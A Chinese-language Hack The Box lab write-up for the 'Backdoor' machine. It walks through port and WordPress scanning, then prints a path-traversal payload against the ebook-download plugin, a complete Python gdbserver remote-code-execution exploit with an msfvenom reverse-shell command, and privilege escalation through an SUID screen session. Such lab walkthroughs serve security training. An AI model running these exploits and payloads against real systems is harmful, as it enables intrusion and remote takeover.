HTB-Backdoor

0x00.简述

0x01.信息收集

可以看到只开放了端口80，22，1337

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.11.125 -- -A                                                                                           130 ⨯
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.125:22
Open 10.10.11.125:80
Open 10.10.11.125:1337
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-05 01:50 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
Initiating Ping Scan at 01:50
Scanning 10.10.11.125 [4 ports]
Completed Ping Scan at 01:50, 0.31s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 01:50
Scanning backdoor.htb (10.10.11.125) [3 ports]
Discovered open port 22/tcp on 10.10.11.125
Discovered open port 80/tcp on 10.10.11.125
Discovered open port 1337/tcp on 10.10.11.125
Completed SYN Stealth Scan at 01:50, 0.82s elapsed (3 total ports)
Initiating Service scan at 01:50
Scanning 3 services on backdoor.htb (10.10.11.125)
Completed Service scan at 01:53, 175.46s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against backdoor.htb (10.10.11.125)
Retrying OS detection (try #2) against backdoor.htb (10.10.11.125)
Initiating Traceroute at 01:53
Completed Traceroute at 01:53, 1.89s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:53
Completed Parallel DNS resolution of 1 host. at 01:53, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.10.11.125.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:53
Completed NSE at 01:54, 25.13s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 5.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up, received echo-reply ttl 63 (0.98s latency).
Scanned at 2022-01-05 01:50:23 EST for 229s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqz2EAb2SBSzEIxcu+9dzgUZzDJGdCFWjwuxjhwtpq3sGiUQ1jgwf7h5BE+AlYhSX0oqoOLPKA/QHLxvJ9sYz0ijBL7aEJU8tYHchYMCMu0e8a71p3UGirTjn2tBVe3RSCo/XRQOM/ztrBzlqlKHcqMpttqJHphVA0/1dP7uoLCJlAOOWnW0K311DXkxfOiKRc2izbgfgimMDR4T1C17/oh9355TBgGGg2F7AooUpdtsahsiFItCRkvVB1G7DQiGqRTWsFaKBkHPVMQFaLEm5DK9H7PRwE+UYCah/Wp95NkwWj3u3H93p4V2y0Y6kdjF/L+BRmB44XZXm2Vu7BN0ouuT1SP3zu8YUe3FHshFIml7Ac/8zL1twLpnQ9Hv8KXnNKPoHgrU+sh35cd0JbCqyPFG5yziL8smr7Q4z9/XeATKzL4bcjG87sGtZMtB8alQS7yFA6wmqyWqLFQ4rpi2S0CoslyQnighQSwNaWuBYXvOLi6AsgckJLS44L8LxU4J8=
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
|   256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB7eoJSCw4DyNNaFftGoFcX4Ttpwf+RPo0ydNk7yfqca
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor &#8211; Real-Life
1337/tcp open  waste?  syn-ack ttl 63
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=1/5%OT=22%CT=%CU=33086%PV=Y%DS=2%DC=T%G=N%TM=61D54094%P=x86_64-pc-linux-gnu)
SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%TS=B)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 3.355 days (since Sat Jan  1 17:23:05 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   452.39 ms 10.10.16.1
2   862.16 ms backdoor.htb (10.10.11.125)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 230.65 seconds
           Raw packets sent: 76 (5.268KB) | Rcvd: 60 (4.360KB)

0x02.访问80端口

添加一条host 10.10.11.125 backdoor.htb

手动爬虫，可以发现这是一个wordpress的站点，并且没有泄露什么敏感信息

0x03.wpscan扫描

可以发现wordpress的版本是5.8.1，这个版本历史上还没有爆出漏洞，并且没有扫描出使用的插件

┌──(root💀kali)-[~]
└─# wpscan --url http://10.10.11.125                                                                                           1 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Wed Jan  5 00:39:16 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:01:47 <====================================================> (137 / 137) 100.00% Time: 00:01:47

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jan  5 00:42:56 2022
[+] Requests Done: 180
[+] Cached Requests: 5
[+] Data Sent: 46.386 KB
[+] Data Received: 14.424 MB
[+] Memory used: 234.215 MB
[+] Elapsed time: 00:03:40
                                                                                                                                   
┌──(root💀kali)-[~]
└─# wpscan --url http://10.10.11.125 --wp-plugins-dir

Scan Aborted: missing argument: --wp-plugins-dir
                                                                                                                                   
┌──(root💀kali)-[~]
└─# searchsploit wordpress | grep 5.8.1                                                                                        1 ⨯
                                                                                                                                   
┌──(root💀kali)-[~]
└─#

0x04.目录扫描

本次使用ffuf，可以发现wp-content，wp-includes，wp-admin的目录

┌──(root💀kali)-[~]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://backdoor.htb/FUZZ -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://backdoor.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

# on atleast 2 different hosts [Status: 200, Size: 63901, Words: 3834, Lines: 330]
wp-content              [Status: 301, Size: 317, Words: 20, Lines: 10]
#                       [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# directory-list-2.3-medium.txt [Status: 200, Size: 63901, Words: 3834, Lines: 330]
                        [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 63901, Words: 3834, Lines: 330]
#                       [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# This work is licensed under the Creative Commons  [Status: 200, Size: 63901, Words: 3834, Lines: 330]
#                       [Status: 200, Size: 63901, Words: 3834, Lines: 330]
wp-includes             [Status: 301, Size: 318, Words: 20, Lines: 10]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# Copyright 2007 James Fisher [Status: 200, Size: 63901, Words: 3834, Lines: 330]
#                       [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 0, Words: 1, Lines: 1]
# Priority ordered case sensative list, where entries were found  [Status: 200, Size: 0, Words: 1, Lines: 1]
wp-admin                [Status: 301, Size: 315, Words: 20, Lines: 10]
                        [Status: 200, Size: 0, Words: 1, Lines: 1]
[WARN] Caught keyboard interrupt (Ctrl-C)

0x05.查看插件目录

插件目录plugins默认在wp-content目录下，可以发现ebook-download这么一个插件

查看readme.txt，可以发现版本是1.1

0x06.漏洞利用

google大法发现目录遍历漏洞

poc

/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

查看文件，发现user用户

遍历/home/user/user.txt没有成功

0x07.1337端口利用

01.第一种方法，expdb脚本利用

现在安全测试已经到了瓶颈期，接下来我们以1337端口作为突破口，接续Google大法搜索1337端口

1337端口参考

这里我发现了一个gdbserver RCE

poc

Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver   ->  10.10.10.200:1337
- Attacker's listener  ->  10.10.10.100:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=6666 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 6666

3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.11.125:1337 rev.bin

脚本如下

#!/usr/bin/env python3
import binascii
import socket
import struct
import sys

def checksum(s: str) -> str:
    res = sum(map(ord, s)) % 256
    return f'{res:2x}'

def ack(sock):
    sock.send(b'+')

def send(sock, s: str) -> str:
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()

def exploit(sock, payload: str):
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')
    try:
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        exit(1)
    if arch == '10':
        print('[+] Found x64 arch')
        pc = binascii.unhexlify(pc[:pc.index('0*')])
        pc += b'\0' * (8 - len(pc))
        addr = hex(struct.unpack('<Q', pc)[0])[2:]
        addr = '0' * (16 - len(addr)) + addr
    elif arch == '08':
        print('[+] Found x86 arch')
        pc = binascii.unhexlify(pc)
        pc += b'\0' * (4 - len(pc))
        addr = hex(struct.unpack('<I', pc)[0])[2:]
        addr = '0' * (8 - len(addr)) + addr

    hex_length = hex(len(payload))[2:]

    print('[+] Sending payload')
    send(sock, f'M{addr},{hex_length}:{payload}')
    send(sock, 'vCont;c')

def main():
    if len(sys.argv) < 3:
        print(help)
        exit(1)
    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]
    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        exit(1)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')

if __name__ == '__main__':
    main()

得到user.txt

1	python3 -c 'import pty; pty.spawn("/bin/bash")'

02.第二种方法，msf利用

使用exploit/multi/gdb/gdb_server_exec模块进行利用

0x08.提权

尝试sudo -l需要user用户的密码

user@Backdoor:/home/user$ sudo -l
sudo -l
[sudo] password for user: 

Sorry, try again.
[sudo] password for user: 

Sorry, try again.
[sudo] password for user: 

sudo: 3 incorrect password attempts
user@Backdoor:/home/user$

查看具有SUID的命令

user@Backdoor:/home/user$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
user@Backdoor:/home/user$

screen提权

export TERM=xterm
screen -x root/root

root@Backdoor:~# whoami
root
root@Backdoor:~# ls
root.txt
root@Backdoor:~# cat root.txt
**********************************
root@Backdoor:~#